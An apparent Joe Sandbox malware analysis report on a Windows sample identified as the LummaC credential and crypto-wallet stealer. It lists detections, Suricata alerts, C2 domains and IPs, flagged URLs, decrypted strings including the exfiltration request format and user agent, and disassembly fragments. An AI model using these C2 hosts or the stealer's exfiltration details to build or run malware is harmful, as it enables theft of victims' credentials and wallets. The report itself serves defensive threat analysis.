Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SPFFah2O2q.exe

Overview

General Information

Sample name:SPFFah2O2q.exe
renamed because original name is a hash value
Original sample name:d4d4b5b6ca79bb5b57e8ef3791629e47.exe
Analysis ID:1580893
MD5:d4d4b5b6ca79bb5b57e8ef3791629e47
SHA1:6b8a0d8b88456527484a3eed58f249131d74f436
SHA256:764ee0242a1a188052d65038c3967ceef1cc0554243bc60412d0d5a85064d053
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SPFFah2O2q.exe (PID: 768 cmdline: "C:\Users\user\Desktop\SPFFah2O2q.exe" MD5: D4D4B5B6CA79BB5B57E8EF3791629E47)
    • WerFault.exe (PID: 4032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 1812 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["discokeyus.lat", "sustainskelet.lat", "necklacebudi.lat", "grannyejh.lat", "crosshuaht.lat", "energyaffai.lat", "aspecteirs.lat", "rapeflowwj.lat"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1722412139.00000000020C0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000000.00000002.1720458759.0000000000579000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.1720458759.0000000000540000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: SPFFah2O2q.exe PID: 768JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Click to see the 3 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-26T12:57:12.779136+010020283713Unknown Traffic192.168.2.84970523.55.153.106443TCP
            2024-12-26T12:57:15.330280+010020283713Unknown Traffic192.168.2.849706172.67.157.254443TCP
            2024-12-26T12:57:17.432243+010020283713Unknown Traffic192.168.2.849707172.67.157.254443TCP
            2024-12-26T12:57:19.927100+010020283713Unknown Traffic192.168.2.849708172.67.157.254443TCP
            2024-12-26T12:57:22.644353+010020283713Unknown Traffic192.168.2.849709172.67.157.254443TCP
            2024-12-26T12:57:25.385903+010020283713Unknown Traffic192.168.2.849711172.67.157.254443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-26T12:57:16.092621+010020546531A Network Trojan was detected192.168.2.849706172.67.157.254443TCP
            2024-12-26T12:57:18.190258+010020546531A Network Trojan was detected192.168.2.849707172.67.157.254443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-26T12:57:16.092621+010020498361A Network Trojan was detected192.168.2.849706172.67.157.254443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-26T12:57:18.190258+010020498121A Network Trojan was detected192.168.2.849707172.67.157.254443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-26T12:57:08.211464+010020583541Domain Observed Used for C2 Detected192.168.2.8561541.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-26T12:57:10.149481+010020583581Domain Observed Used for C2 Detected192.168.2.8585151.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-26T12:57:09.069993+010020583601Domain Observed Used for C2 Detected192.168.2.8644161.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-26T12:57:09.692828+010020583621Domain Observed Used for C2 Detected192.168.2.8525811.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-26T12:57:08.692867+010020583641Domain Observed Used for C2 Detected192.168.2.8548391.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-26T12:57:09.293849+010020583701Domain Observed Used for C2 Detected192.168.2.8521961.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-26T12:57:10.369987+010020583741Domain Observed Used for C2 Detected192.168.2.8580181.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-26T12:57:09.922659+010020583761Domain Observed Used for C2 Detected192.168.2.8574071.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-26T12:57:20.828002+010020480941Malware Command and Control Activity Detected192.168.2.849708172.67.157.254443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-26T12:57:13.585530+010028586661Domain Observed Used for C2 Detected192.168.2.84970523.55.153.106443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: SPFFah2O2q.exeAvira: detected
            Antivirus detection for URL or domain
            Source: https://lev-tolstoi.com/CDaUAvira URL Cloud: Label: malware
            Source: https://lev-tolstoi.com/ConteAvira URL Cloud: Label: malware
            Source: https://lev-tolstoi.com/;;Avira URL Cloud: Label: malware
            Source: https://lev-tolstoi.com/m/rAvira URL Cloud: Label: malware
            Source: https://lev-tolstoi.com/apiCAvira URL Cloud: Label: malware
            Source: https://help.steampowered.coAvira URL Cloud: Label: malware
            Source: https://lev-tolstoi.com/https:Avira URL Cloud: Label: malware
            Found malware configuration
            Source: 0.3.SPFFah2O2q.exe.2140000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["discokeyus.lat", "sustainskelet.lat", "necklacebudi.lat", "grannyejh.lat", "crosshuaht.lat", "energyaffai.lat", "aspecteirs.lat", "rapeflowwj.lat"], "Build id": "4h5VfH--"}
            Multi AV Scanner detection for submitted file
            Source: SPFFah2O2q.exeVirustotal: Detection: 41%Perma Link
            Source: SPFFah2O2q.exeReversingLabs: Detection: 50%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: SPFFah2O2q.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
            Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmpString decryptor: crosshuaht.lat
            Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmpString decryptor: sustainskelet.lat
            Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
            Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmpString decryptor: energyaffai.lat
            Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmpString decryptor: necklacebudi.lat
            Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
            Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmpString decryptor: grannyejh.lat
            Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
            Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmpString decryptor: 4h5VfH--
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_00415799 CryptUnprotectData,0_2_00415799

            Compliance

            barindex
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeUnpacked PE file: 0.2.SPFFah2O2q.exe.400000.0.unpack
            Source: SPFFah2O2q.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49711 version: TLS 1.2
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ebx, esi0_2_00422190
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_00422190
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h0_2_00422190
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ecx, eax0_2_00409580
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov word ptr [ebp+00h], ax0_2_00409580
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]0_2_0043C767
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]0_2_0040B70C
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov esi, eax0_2_00415799
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ecx, eax0_2_00415799
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then jmp eax0_2_0042984F
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]0_2_00423860
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov edx, ecx0_2_00438810
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh0_2_00438810
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh0_2_00438810
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then test eax, eax0_2_00438810
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0041682D
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]0_2_0041682D
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]0_2_0041682D
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov word ptr [ecx], bp0_2_0041D83A
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then push C0BFD6CCh0_2_00423086
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then push C0BFD6CCh0_2_00423086
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_0042B170
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]0_2_004179C1
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h0_2_0043B1D0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ebx, eax0_2_0043B1D0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_004291DD
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]0_2_004291DD
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ebx, eax0_2_00405990
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ebp, eax0_2_00405990
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042CA49
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0042DA53
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]0_2_00416263
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]0_2_00415220
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then push esi0_2_00427AD3
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042CAD0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov word ptr [ebx], ax0_2_0041B2E0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then push ebx0_2_0043CA93
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0041CB40
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov word ptr [esi], cx0_2_0041CB40
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00428B61
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042CB11
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042CB22
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_2_0043F330
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ebx, eax0_2_0040DBD9
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ebx, eax0_2_0040DBD9
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]0_2_00417380
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h0_2_0041D380
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then cmp al, 2Eh0_2_00426B95
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00435450
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]0_2_00417380
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then push 00000000h0_2_00429C2B
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_004291DD
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]0_2_004291DD
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_004074F0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_004074F0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]0_2_0043ECA0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h0_2_004385E0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then jmp eax0_2_004385E0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]0_2_00417DEE
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then jmp dword ptr [0044450Ch]0_2_00418591
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]0_2_00428D93
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then xor edi, edi0_2_0041759F
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov eax, dword ptr [0044473Ch]0_2_0041C653
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov edx, ebp0_2_00425E70
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then jmp dword ptr [004455F4h]0_2_00425E30
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ecx, eax0_2_0043AEC0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then xor byte ptr [esp+eax+17h], al0_2_00408F50
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_00408F50
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0042A700
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0041BF14
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]0_2_00419F30
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]0_2_0041E7C0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx eax, word ptr [edx]0_2_004197C2
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov word ptr [edi], dx0_2_004197C2
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov word ptr [esi], cx0_2_004197C2
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ecx, ebx0_2_0042DFE9
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then jmp ecx0_2_0040BFFD
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]0_2_0043EFB0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]0_2_0212F217
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0210D230
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov word ptr [esi], cx0_2_0210D230
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ecx, ebx0_2_0211E250
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then jmp ecx0_2_020FC264
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then push C0BFD6CCh0_2_021132ED
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_0211B3D7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ebx, esi0_2_021123F7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_021123F7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h0_2_021123F7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]0_2_02114031
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]0_2_02108055
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov edx, ebp0_2_021160D7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ecx, eax0_2_0212B127
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0210C17B
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]0_2_0210A197
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then xor byte ptr [esp+eax+17h], al0_2_020F91B7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_020F91B7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_021256B7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_020F7757
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_020F7757
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ecx, eax0_2_020F97E7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov word ptr [ebp+00h], ax0_2_020F97E7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_02119444
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]0_2_02119444
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]0_2_02105487
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then jmp dword ptr [004455F4h]0_2_021164DA
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]0_2_021064CA
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov word ptr [ebx], ax0_2_0210B547
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_2_0212F597
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]0_2_021075E7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h0_2_0210D5E7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]0_2_0210EA27
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx eax, word ptr [edx]0_2_02109A29
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov word ptr [edi], dx0_2_02109A29
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov word ptr [esi], cx0_2_02109A29
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov edx, ecx0_2_02128A77
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh0_2_02128A77
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh0_2_02128A77
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then test eax, eax0_2_02128A77
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then jmp eax0_2_02119AB5
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov word ptr [ecx], bp0_2_0210DAB8
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+6D2CC012h]0_2_02104ACD
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov byte ptr [edi], al0_2_02106B2A
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+6D2CC012h]0_2_02104BD2
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ebx, eax0_2_020F5BF7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ebp, eax0_2_020F5BF7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h0_2_0212887B
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov eax, dword ptr [0044473Ch]0_2_0210C8BA
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0211A967
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]0_2_020FB973
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then jmp eax0_2_0212898E
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]0_2_0212C9CE
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ebx, eax0_2_020FDE40
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ebx, eax0_2_020FDE40
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], AF697AECh0_2_02104E96
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then cmp al, 2Eh0_2_02116E96
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], E785F9BAh0_2_02104E87
